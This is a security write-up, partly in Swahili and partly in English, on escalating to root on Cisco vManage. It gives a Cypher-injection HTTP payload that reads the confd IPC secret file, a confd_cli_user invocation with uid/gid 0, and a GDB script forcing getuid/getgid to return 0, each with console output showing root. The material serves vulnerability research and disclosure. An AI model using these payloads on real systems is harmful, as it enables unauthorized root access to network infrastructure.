Baada ya kuchimba kidogo kupitia baadhi ya nyaraka zinazohusiana na confd na binaries tofauti (zinazopatikana kwa akaunti kwenye tovuti ya Cisco), tuligundua kwamba ili kuthibitisha socket ya IPC, inatumia siri iliyoko katika /etc/confd/confd_ipc_secret:
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
Kumbuka mfano wetu wa Neo4j? Inafanya kazi chini ya haki za mtumiaji vmanage, hivyo inaturuhusu kupata faili hiyo kwa kutumia udhaifu wa awali:
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
Host: vmanage-XXXXXX.viptela.net
[...]
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
Programu ya confd_cli haisaidii hoja za amri lakini inaita /usr/bin/confd_cli_user kwa hoja. Hivyo, tunaweza kuitisha moja kwa moja /usr/bin/confd_cli_user kwa seti zetu za hoja. Hata hivyo, haiwezi kusomeka kwa ruhusa zetu za sasa, hivyo tunapaswa kuipata kutoka rootfs na kuikopi kwa kutumia scp, kusoma msaada, na kuitumia kupata shell:
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
Welcome to Viptela CLI
admin connected from 127.0.0.1 using console on vManage
vManage# vshell
vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
Blogu¹ ya timu ya synacktiv ilielezea njia nzuri ya kupata root shell, lakini tatizo ni kwamba inahitaji kupata nakala ya /usr/bin/confd_cli_user ambayo inaweza kusomwa tu na root. Nilipata njia nyingine ya kupandisha hadhi hadi root bila usumbufu kama huo.
Nilipovunja kipande cha /usr/bin/confd_cli, niliona yafuatayo:
I hypothesized the “confd_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application.
My first attempt was to run the “cmdptywrapper” directly and supplying it with -g 0 -u 0, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it.
As mentioned in synacktiv’s blog(last example), the confd_cli program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system.
I created a GDB script where I forced the API getuid and getgid to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the /etc/confd/confd_ipc_secret directly.
root.gdb:
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
Output ya Console:
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#